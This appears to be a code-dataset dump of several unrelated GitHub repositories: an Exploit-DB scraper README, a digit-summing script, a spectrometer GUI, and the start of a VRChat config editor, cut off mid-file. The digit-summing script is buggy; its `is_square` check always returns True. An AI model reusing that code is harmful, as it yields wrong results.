connectivity between Github and Azure.\n\nAzure PostgreSQL Action: https://github.com/azure/postgresql\n\nGo through the instructions. After creating a PostgreSQL instance, install azure-cli locally and generate the secrets needed for authentication:\n\n```\n az ad sp create-for-rbac --name {server-name} --role contributor \\\n --scopes /subscriptions/{subscription-id}/resourceGroups/{resource-group} \\\n --sdk-auth\n\n# Replace {subscription-id}, {resource-group} and {server-name} with the subscription, resource group and name of the Azure PostgreSQL server\n\n# The command should output a JSON object similar to this:\n\n{\n \"clientId\": \"<GUID>\",\n \"clientSecret\": \"<GUID>\",\n \"subscriptionId\": \"<GUID>\",\n \"tenantId\": \"<GUID>\",\n (...)\n}\n```\n\nFollow the rest of the instruction on the Action documentation: https://github.com/azure/postgresql#configure-github-secrets-with-azure-credentials-and-postgresql-connection-strings\n\n\n### Generating SQL\nThe Github Action can execute a SQL file and run it against the remote database. For this, the scraper builds a SQL file that is placed in the `sql_files` directory which the workflow file (_main.yml_) picks up later. You can see this in the file itself:\n\n```yaml\n - uses: azure/postgresql@v1\n with:\n connection-string: ${{ secrets.AZURE_POSTGRESQL_CONNECTION_STRING }}\n server-name: exploit-db.postgres.database.azure.com\n plsql-file: \"sql_files/*.sql\"\n```\n\n## Alternatives to Github Actions and Azure\nThere is no need to use Github Actions or Azure to make this all work. At the end of the scraping, the data can be pushed over to anywhere, like a CSV file. The scraping can also be done using Jenkins or any other CI/CD platform.\n\nFinally, if you run the scraping code locally and the SQL file gets generated, you can use SQLite to populate the database with the newly generated data.\n" } ]
3
Tahmid-Hossain-287/Adding_digits_of_a_number
https://github.com/Tahmid-Hossain-287/Adding_digits_of_a_number
f66729a57d48f1945e303eeaa843c9ab0df1b196
b3b2041c2303a69c2a4fff3d46a18a2431186ac2
892f7a0181924a5bb37490e4178b98d91255bce3
refs/heads/main
2023-04-26T16:03:06.388235
2021-05-21T15:58:37
2021-05-21T15:58:37
369,584,932
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7628865838050842, "alphanum_fraction": 0.7628865838050842, "avg_line_length": 47.5, "blob_id": "150e3e35f6a1c11f4991ea5df1d22cc2bbaba65c", "content_id": "6ab6e213bcd9fd69ea4a92e6cb8ad4ab00fc17b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 97, "license_type": "no_license", "max_line_length": 68, "num_lines": 2, "path": "/README.md", "repo_name": "Tahmid-Hossain-287/Adding_digits_of_a_number", "src_encoding": "UTF-8", "text": "# Adding_digits_of_a_number\nIt will keep adding the digits of a number until it is of one digit.\n" }, { "alpha_fraction": 0.5112285614013672, "alphanum_fraction": 0.5284016132354736, "avg_line_length": 35.0476188659668, "blob_id": "7bbb73ebb029521cc8786f80bf23836c8b4611bf", "content_id": "26e6c4f89746b020617dc98ea9565ae994cdd9de", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 757, "license_type": "no_license", "max_line_length": 166, "num_lines": 21, "path": "/adding_until_one_digit.py", "repo_name": "Tahmid-Hossain-287/Adding_digits_of_a_number", "src_encoding": "UTF-8", "text": "def adding_all_digits_until_one(n):\n if len(str(n)) > 1:\n first = 0\n for _ in str(n):\n _ = int(_)\n second = _\n second = first + _\n first = _\n if len(str(second)) > 1:\n return adding_all_digits_until_one(int(second)) # If the result contains more than one digit, then it is going to get passed into the function again.\n if str(_) == str(n)[-1]:\n return second # If the iterated item is the last digit of the passed number, the loop is going to stop.\n else:\n return n \ndef is_square(n):\n if str(n)[:1] == 0 or 1 or 4 or 5 or 6 or 9:\n return True\n else:\n return False\n\nprint(adding_all_digits_until_one(99))\n" } ]
2
GNHua/Ocean-optics-spectrometer
https://github.com/GNHua/Ocean-optics-spectrometer
56610885df274b748d7ccc3f8a397991aa7c90f4
8a0f74e9057b5f097953ba13474f377fdcf13709
e5ff37c2d0d7b41b6eb870d92f673e7a1bb0ae9e
refs/heads/master
2021-01-11T09:03:30.842802
2017-03-28T02:52:56
2017-03-28T02:52:56
77,368,911
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5923566818237305, "alphanum_fraction": 0.5953291058540344, "avg_line_length": 31.26027488708496, "blob_id": "07c10426e6190e57f5df02560b182290cb640eff", "content_id": "93c7e1491503a565f3375243dbe2a0977f67cf35", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2355, "license_type": "no_license", "max_line_length": 77, "num_lines": 73, "path": "/ui/device_table_dialog.py", "repo_name": "GNHua/Ocean-optics-spectrometer", "src_encoding": "UTF-8", "text": "import sys\nfrom seabreeze.spectrometers import list_devices\nfrom PyQt4 import QtCore, QtGui, uic\n\nclass DevTableModel(QtCore.QAbstractTableModel):\n def __init__(self, dev=[]):\n super().__init__()\n self._headers = ['Serial Number', 'Model']\n self._dev = dev\n\n def flags(self, index):\n return QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable\n\n def rowCount(self, parent): return len(self._dev)\n def columnCount(self, parent): return 2\n\n def data(self, index, role):\n if not index.isValid(): return None\n if role == QtCore.Qt.DisplayRole:\n return self._dev[index.row()][index.column()]\n elif role == QtCore.Qt.TextAlignmentRole:\n return QtCore.Qt.AlignCenter\n else:\n return None\n\n def headerData(self, section, orientation, role):\n if role == QtCore.Qt.DisplayRole:\n if orientation == QtCore.Qt.Horizontal:\n return self._headers[section]\n else:\n return section+1\n\nUi_Dialog, QDialog = uic.loadUiType('ui/device_table_dialog.ui')\nclass DevTableDialog(QDialog, Ui_Dialog):\n '''\n A dialog window to select device.\n '''\n def __init__(self):\n super().__init__()\n self.setupUi(self)\n\n self.model = DevTableModel()\n self.tableViewDev.setModel(self.model)\n\n self.pushButtonRefresh.clicked.connect(self.refresh)\n self.buttonBox.accepted.connect(self.openDev)\n self.selected_dev = None\n\n self.refresh()\n\n def refresh(self):\n del self.model._dev[:]\n\n for d in list_devices():\n self.model._dev.append([d.serial, d.model])\n\n self.model.layoutChanged.emit()\n\n def openDev(self):\n selected = self.tableViewDev.selectedIndexes()\n if len(selected) > 0:\n # make sure the spectrometer is powered by +5V power supply.\n QtGui.QMessageBox.warning(self, 'Message',\n 'Make sure power supply is connected!',\n QtGui.QMessageBox.Ok)\n # get the serial number of the selected device\n self.selected_dev = self.model._dev[selected[0].row()][0]\n\nif __name__ == '__main__':\n app = QtGui.QApplication(sys.argv)\n main = DevTableDialog()\n main.show()\n sys.exit(app.exec_())\n" }, { "alpha_fraction": 0.5992907881736755, "alphanum_fraction": 0.6141843795776367, "avg_line_length": 26.115385055541992, "blob_id": "871cf93c9b56f50e434db1a93b95934ec9a739a5", "content_id": "925d6a12af9f8c05eccc6313af22e6a1f9573178", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1410, "license_type": "no_license", "max_line_length": 79, "num_lines": 52, "path": "/debug/debug_sb.py", "repo_name": "GNHua/Ocean-optics-spectrometer", "src_encoding": "UTF-8", "text": "import numpy as np\n\nclass Spectrometer:\n @classmethod\n def from_serial_number(cls, serial):\n print(serial + 'opened')\n return cls(serial)\n\n def __init__(self, serial):\n self._has_dark_pixels = True\n self._has_nonlinearity_coeffs = True\n self._serial = serial\n self._model = 'QE65000'\n self._pixels = 1044\n self._minimum_integration_time_micros = 8000\n self._temp = -15\n\n def integration_time_micros(self, t):\n print('set integration time to %d ms' % (t/1000))\n\n def spectrum(self, correct_dark_counts=False, correct_nonlinearity=False):\n return np.transpose(np.genfromtxt('data/test_data.csv', delimiter=','))\n\n def tec_set_enable(self, enable):\n print('Enable TEC: ' + str(enable))\n\n def tec_get_temperature_C(self):\n print('Detector temperature %.1f C' % self._temp)\n return self._temp\n\n def tec_set_temperature_C(self, t):\n self._temp = t\n print('Detector temperature set to %.1f C' % self._temp)\n\n @property\n def serial_number(self):\n return self._serial\n\n @property\n def model(self):\n return self._model\n\n @property\n def pixels(self):\n return self._pixels\n\n @property\n def minimum_integration_time_micros(self):\n return self._minimum_integration_time_micros\n\n def close(self):\n print('Spectrometer closed')\n" }, { "alpha_fraction": 0.7003012299537659, "alphanum_fraction": 0.7123494148254395, "avg_line_length": 17.97142791748047, "blob_id": "1a52a03b622ba5f5632eaf5822553f7d3675ddc1", "content_id": "a48965b815147efd62f2e9028abdd9b47db71f2e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 664, "license_type": "no_license", "max_line_length": 103, "num_lines": 35, "path": "/README.md", "repo_name": "GNHua/Ocean-optics-spectrometer", "src_encoding": "UTF-8", "text": "# Spectrometer #\n\n## What is this repository for\n\n* Build a simple GUI for Ocean Optics spectrometer\n\n## Hardware & Software\n\n* Ocean Optics spectrometer (Tested on QE65000)\n* Anaconda Python 3.5\n* PyQt4\n\n## How to set up spectrometer\n\n* https://github.com/ap--/python-seabreeze\n\n## Usage\n```\n$ python spectrometer.py -h\n\nusage: python spectrometer.py [-h] [-d]\n\noptional arguments:\n -h, --help show this help message and exit\n -d, --debug Use dummy module to debug\n```\n\n## To do\n\n* Add absorbance calculation\n* Plot multiple spectra\n\n## Acknowlegements\n\nThanks to [Andreas Poehlmann](https://github.com/ap--) for developing python support for Ocean Optics instruments.\n" }, { "alpha_fraction": 0.6053511500358582, "alphanum_fraction": 0.6145485043525696, "avg_line_length": 38.900001525878906, "blob_id": "885bcbe0218d24d81cbbc421d06831e807ec98da", "content_id": "35b9e9d6e97f70821279e9843d3fad0d585fb9a4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1196, "license_type": "no_license", "max_line_length": 118, "num_lines": 30, "path": "/threads.py", "repo_name": "GNHua/Ocean-optics-spectrometer", "src_encoding": "UTF-8", "text": "from PyQt4 import QtCore\nimport numpy as np\nimport time, os\n\nclass MultiRunThread(QtCore.QThread):\n \n integrationTimeChanged = QtCore.pyqtSignal(float)\n spectrumAcquiredArr = QtCore.pyqtSignal(np.ndarray)\n spectrumAcquiredArrStr = QtCore.pyqtSignal(str, np.ndarray)\n \n def __init__(self, spec, runs, dark, linear, dir, fn):\n super().__init__()\n self.spec = spec\n self.runs = runs\n self.dark = dark\n self.linear = linear\n self.dir = dir\n self.fn = fn\n \n def run(self):\n for i, run in enumerate(self.runs):\n integration_time_ms, interval_s, repeat = run\n self.spec.integration_time_micros(int(integration_time_ms * 1000))\n self.integrationTimeChanged.emit(integration_time_ms)\n for j in range(repeat):\n s = self.spec.spectrum(correct_dark_counts=self.dark, correct_nonlinearity=self.linear).T\n fn = os.path.join(self.dir, self.fn+'_{0:.0f}ms_{1:d}_{2:02d}'.format(integration_time_ms, i, repeat))\n self.spectrumAcquiredArr.emit(s)\n self.spectrumAcquiredArrStr.emit(fn, s)\n time.sleep(interval_s)" }, { "alpha_fraction": 0.6075462102890015, "alphanum_fraction": 0.6157597303390503, "avg_line_length": 37.701988220214844, "blob_id": "a43645a623aaf1a736997dae51e196937c71e64f", "content_id": "fbfe289615442b1b5ec46d8139e01c5ca09f90f5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11688, "license_type": "no_license", "max_line_length": 109, "num_lines": 302, "path": "/spectrometer.py", "repo_name": "GNHua/Ocean-optics-spectrometer", "src_encoding": "UTF-8", "text": "import os\nimport sys\nimport time\nimport getpass\nimport argparse\nimport numpy as np\nfrom PyQt4 import QtGui, QtCore, uic\nimport matplotlib\nmatplotlib.use('Qt4Agg')\nimport matplotlib.pyplot as plt\nfrom matplotlib.figure import Figure\nfrom matplotlib.backends.backend_qt4agg import (\n FigureCanvasQTAgg as FigureCanvas,\n NavigationToolbar2QT as NavigationToolbar)\n\nui_module_path = os.path.abspath('./ui')\nif ui_module_path not in sys.path:\n sys.path.insert(1,ui_module_path)\n\nfrom run_table_dialog import RunTableDialog\n\nimport threads\n\nclass MyCanvas:\n def __init__(self):\n self.Fig = Figure()\n self.ax = self.Fig.add_subplot(111)\n self.canvas = FigureCanvas(self.Fig)\n\n def update(self, data):\n self.ax.cla()\n self.ax.set_xlabel('Wavelength (nm)')\n self.ax.set_ylabel('Intensity')\n if isinstance(data, list):\n ymax = max([max(d[:,1]) for d in data])\n for d in data:\n self.ax.plot(d[:,0], d[:,1])\n else:\n ymax = max(data[:,1])\n self.ax.plot(data[:,0], data[:,1])\n if ymax > 70000:\n self.ax.set_ylim(0, 70000)\n else:\n self.ax.set_ylim(0,)\n self.canvas.draw()\n\nUi_MainWindow, QMainWindow = uic.loadUiType('ui/spectrometer.ui')\nclass Window(QMainWindow, Ui_MainWindow):\n def __init__(self):\n super().__init__()\n self.setupUi(self)\n self._is_spec_open = False\n self._runs = []\n self._multirundir = ''\n self._multirunfn = ''\n self.path = os.path.join('/')\n\n self._mrt = threads.MultiRunThread(None, None, False, False, '', '')\n self.addmpl()\n\n self.connectUi()\n\n def connectUi(self):\n self.actionSave.triggered.connect(self.save)\n self.actionPlot.triggered.connect(self.plot_file)\n self.actionQuit.triggered.connect(self.quit)\n self.actionOpenDev.triggered.connect(self.openSpectrometer)\n self.actionSpectrum.triggered.connect(self.getSpectrum)\n self.actionMultiRun.triggered.connect(self.multiRun)\n self.actionSaturationTest.triggered.connect(self.saturationTest)\n self.pushButtonSetInt.clicked.connect(self.setIntegrationTime)\n self._mrt.integrationTimeChanged.connect(self.doubleSpinBoxInt.setValue)\n self._mrt.spectrumAcquiredArr.connect(self.saveBackup)\n self._mrt.spectrumAcquiredArr.connect(self.plot)\n self._mrt.spectrumAcquiredArrStr.connect(self.saveCsv)\n\n def addmpl(self):\n self._canvas = MyCanvas()\n self.mplvl.addWidget(self._canvas.canvas)\n self._toolbar = NavigationToolbar(self._canvas.canvas, self.mplwindow, coordinates=True)\n self.mplvl.addWidget(self._toolbar)\n\n def openSpectrometer(self):\n if not self._is_spec_open:\n devtable = DevTableDialog()\n if devtable.exec_() == QtGui.QDialog.Accepted and devtable.selected_dev:\n try:\n self.spec = sb.Spectrometer.from_serial_number(devtable.selected_dev)\n except:\n QtGui.QMessageBox.critical(self, 'Message',\n \"Can't find spectrometer\",\n QtGui.QMessageBox.Ok)\n self.initSpectrometer()\n else:\n self.closeSpectrometer()\n self.actionSpectrum.setEnabled(self._is_spec_open)\n self.actionOpenDev.setChecked(self._is_spec_open)\n self.actionMultiRun.setEnabled(self._is_spec_open)\n self.actionSaturationTest.setEnabled(self._is_spec_open)\n\n def initSpectrometer(self):\n self.initTEC()\n self.spec.integration_time_micros(self.spec.minimum_integration_time_micros)\n self.pushButtonSetInt.setEnabled(True)\n self.doubleSpinBoxInt.setEnabled(True)\n self.doubleSpinBoxInt.setValue(self.spec.minimum_integration_time_micros/1000)\n self.doubleSpinBoxInt.setMinimum(self.spec.minimum_integration_time_micros/1000)\n self.checkBoxDark.setEnabled(self.spec._has_dark_pixels)\n self.checkBoxDark.setChecked(self.spec._has_dark_pixels)\n self.checkBoxNonlinear.setEnabled(self.spec._has_nonlinearity_coeffs)\n self.checkBoxNonlinear.setChecked(self.spec._has_nonlinearity_coeffs)\n self._is_spec_open = True\n self._mrt.spec = self.spec\n self.actionOpenDev.setText('&Close Device')\n self.actionOpenDev.setToolTip('Close Device')\n\n def initTEC(self):\n # initialize thermoelectric cooling\n self.spec.tec_get_temperature_C()\n time.sleep(0.1)\n self.spec.tec_set_enable(False)\n time.sleep(0.1)\n self.spec.tec_set_temperature_C(-15)\n time.sleep(0.1)\n self.spec.tec_set_enable(True)\n time.sleep(0.1)\n while(self.spec.tec_get_temperature_C() > 10):\n # make sure the spectrometer is powered by +5V power supply.\n QtGui.QMessageBox.warning(self, 'Message',\n 'Connect Power Supply!\\nThen wait for a few seconds.',\n QtGui.QMessageBox.Ok)\n time.sleep(2)\n self.initTEC()\n\n def closeSpectrometer(self):\n self.spec.close()\n self.pushButtonSetInt.setEnabled(False)\n self.doubleSpinBoxInt.setEnabled(False)\n self.checkBoxDark.setChecked(False)\n self.checkBoxDark.setEnabled(False)\n self.checkBoxNonlinear.setChecked(False)\n self.checkBoxNonlinear.setEnabled(False)\n self._is_spec_open = False\n self._mrt.spec = None\n self.actionOpenDev.setText('&Open Device')\n self.actionOpenDev.setToolTip('Open Device')\n\n def setIntegrationTime(self):\n self.spec.integration_time_micros(int(self.doubleSpinBoxInt.value() * 1000))\n\n def getSpectrum(self):\n correct_dark_counts = self.checkBoxDark.isChecked()\n correct_nonlinearity = self.checkBoxNonlinear.isChecked()\n if self.actionMultiRun.isChecked():\n self._mrt.runs = self._runs\n self._mrt.dark = correct_dark_counts\n self._mrt.linear = correct_nonlinearity\n self._mrt.start()\n else:\n self.spectrum = self.spec.spectrum(correct_dark_counts, correct_nonlinearity).T\n self.saveBackup(self.spectrum)\n self.plot(self.spectrum)\n\n def plot(self, data):\n '''Get the name and directory'''\n self._canvas.update(data)\n\n def saveBackup(self, data):\n if not os.path.exists('./backup'):\n os.makedirs('./backup')\n self.saveCsv(filename=os.path.join('./backup', time.strftime('%Y%m%d_%H%M%S')), data=data)\n\n def getSpecSetting(self):\n date = time.strftime(\"%D\")\n fiber = '100 um fiber' if self.radioButton100um.isChecked() else '1000 um fiber'\n slit = 'With slit' if self.checkBoxSlit.isChecked() else 'No slit'\n intTime = 'Integration time: %.1f ms' % self.doubleSpinBoxInt.value()\n darkCor = 'on' if self.checkBoxDark.isChecked() else 'off'\n nonlinearCor = 'on' if self.checkBoxNonlinear.isChecked() else 'off'\n return [date, fiber, slit, intTime, \\\n 'Dark correction '+darkCor, 'Nonlinearity correction '+nonlinearCor]\n\n def save(self):\n fn = self.getFileName(0)\n if fn:\n fn = os.path.splitext(fn)[0]\n self.saveCsv(fn)\n self.savePlot(fn)\n\n def plot_file(self):\n fn = self.getFileName(1)\n if fn:\n data = np.genfromtxt(fn, delimiter=',')\n self.plot(data, mode='spectrum')\n\n def saveCsv(self, filename, data=None):\n if data is None:\n data = self.spectrum\n text = ','.join(self.getSpecSetting())\n np.savetxt(filename+'.csv', data, delimiter=',',\n header=text + '\\nwavelength,intensity')\n\n def savePlot(self, filename):\n fig, ax = plt.subplots(figsize=(12,6))\n ax.plot(self.spectrum[:,0], self.spectrum[:,1])\n ax.set_xlabel('Wavelength (nm)')\n ax.set_ylabel('Intensity')\n ax.text(0.05, 0.9, '\\n'.join(self.getSpecSetting()),\n ha='left', va='top', transform=ax.transAxes)\n plt.savefig(filename+'.png')\n plt.close('all')\n\n def getFileName(self, mode):\n '''\n Get the name and directory\n mode 0 1\n save open\n '''\n title = ['Save data', 'Find']\n acceptmode = [QtGui.QFileDialog.AcceptSave, QtGui.QFileDialog.AcceptOpen]\n\n fd = QtGui.QFileDialog()\n fd.setWindowTitle(title[mode])\n fd.setDirectory(self.path)\n fd.setAcceptMode(acceptmode[mode])\n fd.setDefaultSuffix(\"csv\")\n fd.setNameFilter(\"csv (*.csv)\")\n\n if fd.exec_() == QtGui.QFileDialog.Accepted:\n filename = str(fd.selectedFiles()[0])\n self.path = os.path.dirname(filename)\n return filename\n else:\n return\n\n def multiRun(self):\n # list(self._runs): copy self._runs instead of referring to it.\n dialog = RunTableDialog(runs=list(self._runs))\n dialog.lineEditDir.setText(self._multirundir)\n dialog.lineEditFn.setText(self._multirunfn)\n if dialog.exec_() == QtGui.QDialog.Accepted:\n self._runs = list(dialog.model._runs)\n self._multirundir = dialog.lineEditDir.text()\n self._multirunfn = os.path.splitext(dialog.lineEditFn.text())[0]\n self._mrt.dir = self._multirundir\n self._mrt.fn = self._multirunfn\n multirunready = (len(self._runs) > 0) and bool(self._multirundir) and bool(self._multirunfn)\n self.actionMultiRun.setChecked(multirunready)\n self.pushButtonSetInt.setEnabled(not multirunready)\n self.doubleSpinBoxInt.setEnabled(not multirunready)\n\n def saturationTest(self):\n longExp = self.doubleSpinBoxInt.value()\n shortExp = longExp / 4\n self.spec.integration_time_micros(int(shortExp * 1000))\n shortSpec = np.transpose(self.spec.spectrum(correct_dark_counts=self.checkBoxDark.isChecked(), \\\n correct_nonlinearity=self.checkBoxNonlinear.isChecked()))\n shortSpec[:,1] *= 4\n time.sleep(0.1)\n self.spec.integration_time_micros(int(longExp * 1000))\n longSpec = np.transpose(self.spec.spectrum(correct_dark_counts=self.checkBoxDark.isChecked(), \\\n correct_nonlinearity=self.checkBoxNonlinear.isChecked()))\n self.plot([shortSpec, longSpec])\n\n def quit(self):\n if self._is_spec_open:\n self.spec.close()\n sys.exit()\n\n def closeEvent(self, event):\n self.quit()\n event.accept()\n\n\ndef main(args):\n parser = argparse.ArgumentParser(prog='python spectrometer.py')\n parser.add_argument('-d', '--debug', action='store_true', default=False,\n help='Use dummy module to debug')\n args = parser.parse_args(args)\n if args.debug:\n debug_module_path = os.path.abspath('./debug')\n if debug_module_path not in sys.path:\n sys.path.insert(1,debug_module_path)\n\n import debug_sb as sb\n from debug_device_table_dialog import DevTableDialog\n else:\n import seabreeze.spectrometers as sb\n from device_table_dialog import DevTableDialog\n\n # make imported module global\n globals()['sb'] = sb\n globals()['DevTableDialog'] = DevTableDialog\n\n app = QtGui.QApplication(sys.argv)\n main = Window()\n main.show()\n sys.exit(app.exec_())\n\n\nif __name__ == '__main__':\n main(sys.argv[1:])\n" }, { "alpha_fraction": 0.6167935729026794, "alphanum_fraction": 0.6225560903549194, "avg_line_length": 35.81060791015625, "blob_id": "49d56b3d15a3884a87c1ccba156a7c489d2d3a4f", "content_id": "7ca7764ba0502b1b2b86df8107a76f06d751c798", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4859, "license_type": "no_license", "max_line_length": 94, "num_lines": 132, "path": "/ui/run_table_dialog.py", "repo_name": "GNHua/Ocean-optics-spectrometer", "src_encoding": "UTF-8", "text": "import sys\nfrom PyQt4 import QtCore, QtGui, uic\n\nclass RunTableModel(QtCore.QAbstractTableModel):\n def __init__(self, runs=[]):\n \"\"\"\n `runs` are a list of run settings, format [[8,1,1],[9,2,2]].\n \"\"\"\n super().__init__()\n self._headers = ['Integration (ms)', 'Interval (s)', 'Repeat']\n self._runs = runs\n \n def flags(self, index):\n return QtCore.Qt.ItemIsEditable | QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable\n \n def rowCount(self, parent): return len(self._runs)\n def columnCount(self, parent): return 3\n \n def data(self, index, role):\n if not index.isValid(): return None\n if role == QtCore.Qt.DisplayRole:\n return self._runs[index.row()][index.column()]\n elif role == QtCore.Qt.TextAlignmentRole:\n return QtCore.Qt.AlignCenter\n else:\n return None\n \n def setData(self, index, value, role=QtCore.Qt.EditRole):\n self._runs[index.row()][index.column()] = value\n self.dataChanged.emit(index, index)\n return True\n \n def headerData(self, section, orientation, role):\n if role == QtCore.Qt.DisplayRole:\n if orientation == QtCore.Qt.Horizontal:\n return self._headers[section]\n else:\n return section+1\n\nclass SpinBoxDelegate(QtGui.QItemDelegate):\n def __init__(self):\n super().__init__()\n \n def setEditorData(self, editor, index):\n editor.setValue(index.model()._runs[index.row()][index.column()])\n \n def setModelData(self, editor, model, index):\n model.setData(index, editor.value())\n \n def currentValueChanged(self):\n self.commitData.emit(self.sender())\n \nclass IntegrationDelegate(SpinBoxDelegate):\n def __init__(self): super().__init__()\n def createEditor(self, parent, option, index):\n spinbox = QtGui.QDoubleSpinBox(parent)\n spinbox.setRange(8, 10000)\n spinbox.setDecimals(1)\n spinbox.valueChanged.connect(self.currentValueChanged)\n return spinbox\n \nclass IntervalDelegate(SpinBoxDelegate):\n def __init__(self): super().__init__()\n def createEditor(self, parent, option, index):\n spinbox = QtGui.QDoubleSpinBox(parent)\n spinbox.valueChanged.connect(self.currentValueChanged)\n return spinbox\n \nclass RepeatDelegate(SpinBoxDelegate):\n def __init__(self): super().__init__()\n def createEditor(self, parent, option, index):\n spinbox = QtGui.QSpinBox(parent)\n spinbox.valueChanged.connect(self.currentValueChanged)\n return spinbox\n\nUi_Dialog, QDialog = uic.loadUiType('ui/run_table_dialog.ui')\nclass RunTableDialog(QDialog, Ui_Dialog):\n def __init__(self, runs=[]):\n super().__init__()\n self.setupUi(self)\n\n self.model = RunTableModel(runs=runs)\n self.tableViewRun.setModel(self.model)\n \n self._delegates = [IntegrationDelegate(), IntervalDelegate(), RepeatDelegate()]\n self.tableViewRun.setItemDelegateForColumn(0, self._delegates[0])\n self.tableViewRun.setItemDelegateForColumn(1, self._delegates[1])\n self.tableViewRun.setItemDelegateForColumn(2, self._delegates[2])\n self.tableViewRun.selectionModel().selectionChanged.connect(self.enableInsert)\n \n self.pushButtonAdd.clicked.connect(self.add)\n self.pushButtonInsert.clicked.connect(self.insert)\n self.pushButtonRemove.clicked.connect(self.remove)\n self.pushButtonRemoveAll.clicked.connect(self.removeAll)\n \n self.toolButtonDir.clicked.connect(self.setDir)\n \n def enableInsert(self):\n enabled = False if len(self.tableViewRun.selectedIndexes()) == 0 else True\n self.pushButtonInsert.setEnabled(enabled)\n self.pushButtonRemove.setEnabled(enabled)\n \n def add(self):\n self.insertAt(len(self.model._runs))\n \n def insert(self):\n row = self.tableViewRun.selectedIndexes()[0].row()\n self.insertAt(row)\n \n def insertAt(self, row):\n self.model._runs.insert(row, [8,1,1])\n self.model.layoutChanged.emit()\n \n def remove(self):\n row = self.tableViewRun.selectedIndexes()[0].row()\n del self.model._runs[row]\n self.model.layoutChanged.emit()\n \n def removeAll(self):\n del self.model._runs[:] # delete content, but keep the list\n self.model.layoutChanged.emit()\n \n def setDir(self):\n dir = QtGui.QFileDialog.getExistingDirectory(None, 'Select a folder:', '/', \\\n QtGui.QFileDialog.ShowDirsOnly)\n self.lineEditDir.setText(dir)\n\nif __name__ == '__main__':\n app = QtGui.QApplication(sys.argv)\n main = RunTableDialog()\n main.show()\n sys.exit(app.exec_())\n" } ]
6
dj3520/vrcjson
https://github.com/dj3520/vrcjson
4e1565944305cfe6bf146503ad5f7cc6d8f76b25
04ad7bae206efe874429105e556352ffe7023c6a
d4958777de05ef114ce032e1ac8c1d53f93f4b18
refs/heads/master
2023-06-11T07:29:22.830187
2021-07-05T03:36:01
2021-07-05T03:36:01
382,974,162
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6896023154258728, "alphanum_fraction": 0.7044561505317688, "avg_line_length": 51.9746208190918, "blob_id": "e840076225f533c21559e1d101ccd1b7eb93b4a5", "content_id": "3b965c789f38700d5a2f2a31b2a3c3fa1279ee4b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10435, "license_type": "no_license", "max_line_length": 175, "num_lines": 197, "path": "/vrcjson.py", "repo_name": "dj3520/vrcjson", "src_encoding": "UTF-8", "text": "import tkinter as tk\nimport tkinter.messagebox\n\nfrom tkinter import filedialog\n\nimport os, json\nimport traceback # End user\n\nrootwin = tk.Tk()\nrootwin.title(\"VRCJSON - VRChat config file GUI * by DJ3520\")\n\nfile = os.getenv('USERPROFILE') + \"\\\\AppData\\\\LocalLow\\\\VRChat\\\\VRChat\\\\config.json\"\n\ndef insure_int(val):\n return val.isdigit() or val == \"\"\n\ncache_directory = tk.StringVar()\n\ndef reset_folder():\n cache_directory.set(\"\")\n\ndef choose_folder():\n folder = filedialog.askdirectory(title=\"Choose new location for VRChat cache.\", initialdir=os.getenv('USERPROFILE') + \"\\\\AppData\\\\LocalLow\\\\VRChat\\\\VRChat\", mustexist=True)\n if not os.path.isdir(folder): folder = \"\"\n cache_directory.set(folder)\n\nverify=(rootwin.register(insure_int))\n\nsave_settings_button = tk.Button(rootwin, text=\"Click this button to save updated settings to file.\")\nsave_settings_button.pack(side=tk.TOP, fill=tk.X)\n\n# Cache settings\ncache = tk.LabelFrame(rootwin, text=\"Cache settings\")\ncache.pack(side=tk.TOP, fill=tk.X)\n\ntk.Button(cache, text=\"Choose cache location\", command=choose_folder).grid(row=0, column=0)\nreset_location = tk.Button(cache, text=\"Reset cache location\", command=reset_folder)\nreset_location.grid(row=0, column=1)\ncache_size = tk.StringVar()\ntk.Label(cache, text=\"Maximum cache size in GB: \").grid(row=1, column=0)\ntk.Entry(cache, textvariable=cache_size, width=6, validate='all', validatecommand=(verify, '%P')).grid(row=1, column=1)\ncache_expiry_time = tk.StringVar()\ntk.Label(cache, text=\"Days before item in cache is deleted: \").grid(row=2, column=0)\ntk.Entry(cache, textvariable=cache_expiry_time, width=6, validate='all', validatecommand=(verify, '%P')).grid(row=2, column=1)\n\ndef update_reset(*args):\n if cache_directory.get() == \"\": reset_location.config(state=tk.DISABLED)\n else: reset_location.config(state=tk.NORMAL)\n\ncache_directory.trace('w', update_reset)\ncache_directory.set(\"\")\n\n# Rich presence\nrichpres = tk.LabelFrame(rootwin, text=\"Discord and Steam integration\")\nrichpres.pack(side=tk.TOP, fill=tk.X)\ndisableRichPresence = tk.BooleanVar()\ntk.Checkbutton(richpres, text=\"Show your location in Discord and Steam.\", variable=disableRichPresence).grid(row=0)\ndisableRichPresence.set(True)\n\n# Dynbone limiter\ndynbones = tk.LabelFrame(rootwin, text=\"Dynamic Bone Limiter\")\ndynbones.pack(side=tk.TOP, fill=tk.X)\ntk.Label(dynbones, text=\"Maximum amount of objects/bones movable by dynamic bones per avatar: \").grid(row=0, column=0)\ndynamic_bone_max_affected_transform_count = tk.StringVar()\ntk.Entry(dynbones, textvariable=dynamic_bone_max_affected_transform_count, width=4, validate='all', validatecommand=(verify, '%P')).grid(row=0, column=1)\ntk.Label(dynbones, text=\"Maximum amount of dynamic bone colliders per avatar: \").grid(row=1, column=0)\ndynamic_bone_max_collider_check_count = tk.StringVar()\ntk.Entry(dynbones, textvariable=dynamic_bone_max_collider_check_count, width=4, validate='all', validatecommand=(verify, '%P')).grid(row=1, column=1)\n\n# Picture settings\npictures = tk.LabelFrame(rootwin, text=\"Camera and screenshot settings\")\npictures.pack(side=tk.TOP, fill=tk.X)\ncamera_res_height = tk.StringVar()\ncamera_res_width = 